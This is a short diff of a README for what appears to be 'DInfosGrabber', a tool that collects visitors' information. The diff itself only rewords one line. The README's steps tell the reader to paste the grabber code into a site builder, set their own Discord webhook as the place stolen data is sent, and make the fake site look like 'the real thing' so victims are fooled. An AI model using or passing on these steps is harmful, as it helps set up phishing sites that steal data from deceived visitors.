douxxu/DInfosGrabber/README.md

 - Then drag this block into the web page and click on it to open the editing panel.
 - Then press 'modify' and remove all the code already there. insert the DInfosGrabber code, replacing the 'YOUR DISCORD WEBHOOK HERE' with the link to your discord webhook.
 - Then save the changes.
-- and voilà! your DInfosGrabber site is ready!
+- and we are! your DInfosGrabber site is ready!
 - I'd advise you to make your site as similar as possible to the real thing, using the blocks available, otherwise you'll know it's a fake.

 </details>